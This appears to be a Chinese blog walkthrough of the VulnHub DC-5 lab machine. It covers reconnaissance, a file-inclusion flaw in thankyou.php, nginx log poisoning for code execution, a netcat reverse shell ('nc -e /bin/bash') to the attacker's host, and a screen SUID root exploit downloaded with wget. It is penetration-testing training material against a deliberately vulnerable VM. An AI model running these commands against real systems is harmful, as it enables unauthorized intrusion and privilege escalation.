vulnhub dc-5

1.信息搜集
官方文档描述
在这里插入图片描述
主要内容不会使用到ssh,进入的方式很难被发现,是改变页面刷新的方法,只有一个flag
nmap扫描
存活主机
192.168.85.176
端口
80
111
中间件:
nginx
2.访问网站,进行进一步信息搜集

在这里插入图片描述
在这里插入图片描述
通过这两张图片的对比发现最下面的内容发生了变化
一般来说页脚的文件都是包含进来的,猜测页脚文件名footer.php
访问发现是成功的
在这里插入图片描述
在thankyou.php文件位置可能有文件包含,是通过contact位置提交的
使用文件包含可能的文件名尝试以下file,filename等
通过尝试filen是传入的参数,当不知道时就可以尝试使用爆破参数名
在这里插入图片描述

3.ua头日志包含写shell
nginx日志文件位置/var/log/nginx/access.log
burp抓包
在这里插入图片描述
post传入

1=phpinfo();

成功执行
在这里插入图片描述
连接蚁剑

4.提权
nc反弹shell到kali

nc -e /bin/bash 192.168.85.129 4455

kali nc监听

nc -lvnp 4455

python构建交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

进行信息搜集
家目录,tmp目录等没发现信息
尝试suid提权

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
发现screen等,其他也要关注,第一个不成功就用其他的

searchsploit screen

找到相关版本
在这里插入图片描述

定位exp位置

locate linux/local/41154.sh 

上传到靶机
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 1.sh
python -m http.server 8000
在这里插入图片描述
靶机下载

wget http://192.168.85.129:8000/1.sh

执行exp
在这里插入图片描述
linux第三方提权
dc-5

posted @ 2024-10-30 15:37  mushangqiujin  阅读(1)  评论(0编辑  收藏  举报  来源